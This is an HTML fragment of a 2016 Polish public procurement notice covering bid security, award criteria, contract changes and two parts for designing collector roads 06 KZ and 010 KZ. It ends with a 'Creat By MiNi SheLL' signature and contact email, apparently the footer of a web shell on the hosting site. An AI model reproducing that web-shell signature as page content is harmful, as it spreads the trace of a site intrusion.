- pieniężnej - załączyć do oferty dokument potwierdzający wniesienie wadium,
 - innej niż pieniężnej  oryginał dokumentu został złożony w oddzielnej kopercie, a jego kopia załączona do oferty.
4.Oferta Wykonawcy, który nie wniesie wadium lub wniesie je w sposób nieprawidłowy zostanie odrzucona.
5.Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 4a ustaw pzp.
6.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
7.Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
8.Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 5, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
9.Zamawiający zatrzymuje wadium wraz z odsetkami zgodnie z ustawowymi przesłankami  art. 46 ust. 4a i ust. 5.  </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający dopuszcza dokonywanie zmian w umowie zgodnie z zapisami art. 144 ustawy Prawo zamówień publicznych. Zmiany mogą dotyczyć min.: wysokości wynagrodzenie w wyniku wystąpienia dodatkowych usług, terminu wykonania zamówienia jeżeli wynikły okoliczności nie możliwe do przewidzenia w trakcie przygotowywania i przeprowadzania postępowania, w przypadku trudnych do przewidzenia problemów formalno  prawnych, jeżeli nie wynikają one z winy Projektanta, a Zamawiający wyrazi zgodę na zmianę, zmianę podwykonawcy. <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 02/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>droga zbiorcza 06 KZ<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część I zamówienia. Droga zbiorcza oznaczona w miejscowym planie zagospodarowania przestrzennego 06 KZ łącząca ul. Ludową z ul. 1 Maja wraz z infrastrukturą towarzyszącą: ciągi piesze, ścieżki rowerowe, oświetlenie uliczne, kanalizacja sanitarna, deszczowa i wodociąg. Projekt ma również obejmować włączenie w ul. Ludową i 1 Maja.  
Do obowiązków wykonawcy  należą wszelkie prace przygotowawcze i pomocnicze związane z prawidłowym opracowaniem projektu, w tym:
1.	Uzgodnienie z zamawiającym proponowanych rozwiązań funkcjonalnych 
i użytkowych oraz głównych rozwiązań materiałowych (z uwzględnieniem optymalizacji rozwiązań projektowych)  na etapie koncepcji projektu.
2.	Uzyskanie w niezbędnym zakresie wszelkich wymaganych uzgodnień branżowych wraz z naradą koordynacyjną  jeśli będzie to wymagana przepisami prawa
3.	Mapy do celów projektowych zapewnia wykonawca dokumentacji, podziały gruntów.  
4.	Przygotowanie karty informacyjnej przedsięwzięcia niezbędnej do uzyskania decyzji 
o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia. 
5.	Sporządzenie operatu wodnoprawnego i uzyskanie pozwolenia wodnoprawnego na odprowadzenie wód opadowych  jeśli będzie to wymagane przepisami prawa.
6.	Usunięcie kolizji z istniejącymi sieciami.
7.	Zapewnić miejsce dla sieci gazowej i elektroenergetycznej, które wykonywane będą przez gestorów sieci poza niniejszym opracowaniem.
8.	Uzgodnienia i opinie wymagane przepisami ustawy Prawo Budowlane oraz ustawy z dnia 10 kwietnia 2003r. art. 11b oraz art. 11d o szczególnych zasadach przygotowywania i realizacji inwestycji w zakresie dróg publicznych oraz wszelkie inne uzgodnienia niezbędne do prawidłowego wykonania przedmiotu zamówienia.  
9.	Inne czynności jakie wynikły w trakcie projektowania niezbędne do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID).
Zakres rzeczowy obejmuje co najmniej:
1.	Inwentaryzacja terenu
2.	Projekt budowlany i wykonawczy  6 egz. + wersja elektroniczna - 1 egz. 
3.	Przedmiar robót  2 egz. + wersja elektroniczna - 1 egz. (oddzielnie na poszczególne elementy)
4.	Kosztorys inwestorski  2 egz. + wersja elektroniczna - 1 egz. (oddzielnie na poszczególne elementy)
5.	Specyfikacje techniczne wykonania i odbioru robót  1 egz. + wersja elektroniczna - 
1 egz. (oddzielnie na poszczególne elementy) oraz plan BIOZ.
6.	Projekt organizacji ruchu.
Dokumentacja projektowa winna być wykonana zgodnie z wymogami art. 29 i art. 30 prawa zamówień publicznych  wykonawca winien opisać przedmiot zamówienia i jego cechy w sposób jednoznaczny i wyczerpujący, za pomocą dostatecznie dokładnych i zrozumiałych określeń, uwzględniając wszystkie wymagania i okoliczności mogące mieć wpływ na proces sporządzania oferty, a więc taki, który zapewnia, że wykonawcy będą w stanie zidentyfikować, co jest przedmiotem zamówienia w sposób, który nie utrudni uczciwej konkurencji (zakazuje się dokonywania opisu przedmiotu zamówienia poprzez wskazanie znaków towarowych, patentów lub pochodzenia).
Wykonawca zobowiązany będzie do bezpłatnej aktualizacji kosztorysu inwestorskiego w terminie 3 lat licząc od daty wykonania i odbioru zamówienia oraz zapewnienia nadzoru autorskiego (bez dodatkowego wynagrodzenia) podczas realizacji robót na podstawie opracowanej dokumentacji.
Rozliczenie za przedmiot umowy odbywać się będzie na podstawie faktury wystawionej po dostarczeniu kompletnej, poprawnej dokumentacji i podpisaniu protokołu jej odbioru.
Faktura będzie płatna w terminie 30 dni od daty dostarczenia jej przez wykonawcę do siedziby zamawiającego. Dopuszcza się faktury przejściowe w wysokości do 30% wartości zamówienia nie wcześniej niż po zaakceptowaniu koncepcji przez zamawiającego.
Wykonawca ponosi pełną odpowiedzialność za skutki wynikające z nieterminowego i nienależytego wykonania zadania.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71300000-1, 71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 14/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>droga zbiorcza 010KZ<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część II zamówienia . Droga zbiorcza oznaczona w miejscowym planie zagospodarowania przestrzennego 010 KZ łącząca ul. Szpitalną z ul. 1 Maja wraz z infrastrukturą towarzyszącą: ciągi piesze, oświetlenie uliczne, kanalizacja sanitarna, deszczowa i wodociąg. Projekt ma również obejmować włączenie w ul. Szpitalna i 1 Maja.
Do obowiązków wykonawcy dla części i II zamówienia) należą wszelkie prace przygotowawcze i pomocnicze związane z prawidłowym opracowaniem projektu, w tym:
1.	Uzgodnienie z zamawiającym proponowanych rozwiązań funkcjonalnych 
i użytkowych oraz głównych rozwiązań materiałowych (z uwzględnieniem optymalizacji rozwiązań projektowych)  na etapie koncepcji projektu.
2.	Uzyskanie w niezbędnym zakresie wszelkich wymaganych uzgodnień branżowych wraz z naradą koordynacyjną  jeśli będzie to wymagana przepisami prawa
3.	Mapy do celów projektowych zapewnia wykonawca dokumentacji, podziały gruntów.  
4.	Przygotowanie karty informacyjnej przedsięwzięcia niezbędnej do uzyskania decyzji 
o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia. 
5.	Sporządzenie operatu wodnoprawnego i uzyskanie pozwolenia wodnoprawnego na odprowadzenie wód opadowych  jeśli będzie to wymagane przepisami prawa.
6.	Usunięcie kolizji z istniejącymi sieciami.
7.	Zapewnić miejsce dla sieci gazowej i elektroenergetycznej, które wykonywane będą przez gestorów sieci poza niniejszym opracowaniem.
8.	Uzgodnienia i opinie wymagane przepisami ustawy Prawo Budowlane oraz ustawy z dnia 10 kwietnia 2003r. art. 11b oraz art. 11d o szczególnych zasadach przygotowywania i realizacji inwestycji w zakresie dróg publicznych oraz wszelkie inne uzgodnienia niezbędne do prawidłowego wykonania przedmiotu zamówienia.  
9.	Inne czynności jakie wynikły w trakcie projektowania niezbędne do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID).
Zakres rzeczowy obejmuje co najmniej:
1.	Inwentaryzacja terenu
2.	Projekt budowlany i wykonawczy  6 egz. + wersja elektroniczna - 1 egz. 
3.	Przedmiar robót  2 egz. + wersja elektroniczna - 1 egz. (oddzielnie na poszczególne elementy)
4.	Kosztorys inwestorski  2 egz. + wersja elektroniczna - 1 egz. (oddzielnie na poszczególne elementy)
5.	Specyfikacje techniczne wykonania i odbioru robót  1 egz. + wersja elektroniczna - 
1 egz. (oddzielnie na poszczególne elementy) oraz plan BIOZ.
6.	Projekt organizacji ruchu.

Dokumentacja projektowa winna być wykonana zgodnie z wymogami art. 29 i art. 30 prawa zamówień publicznych  wykonawca winien opisać przedmiot zamówienia i jego cechy w sposób jednoznaczny i wyczerpujący, za pomocą dostatecznie dokładnych i zrozumiałych określeń, uwzględniając wszystkie wymagania i okoliczności mogące mieć wpływ na proces sporządzania oferty, a więc taki, który zapewnia, że wykonawcy będą w stanie zidentyfikować, co jest przedmiotem zamówienia w sposób, który nie utrudni uczciwej konkurencji (zakazuje się dokonywania opisu przedmiotu zamówienia poprzez wskazanie znaków towarowych, patentów lub pochodzenia).
Wykonawca zobowiązany będzie do bezpłatnej aktualizacji kosztorysu inwestorskiego w terminie 3 lat licząc od daty wykonania i odbioru zamówienia oraz zapewnienia nadzoru autorskiego (bez dodatkowego wynagrodzenia) podczas realizacji robót na podstawie opracowanej dokumentacji.
Rozliczenie za przedmiot umowy odbywać się będzie na podstawie faktury wystawionej po dostarczeniu kompletnej, poprawnej dokumentacji i podpisaniu protokołu jej odbioru.
Faktura będzie płatna w terminie 30 dni od daty dostarczenia jej przez wykonawcę do siedziby zamawiającego. Dopuszcza się faktury przejściowe w wysokości do 30% wartości zamówienia nie wcześniej niż po zaakceptowaniu koncepcji przez zamawiającego.
Wykonawca ponosi pełną odpowiedzialność za skutki wynikające z nieterminowego i nienależytego wykonania zadania.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71300000-1, 71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 14/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com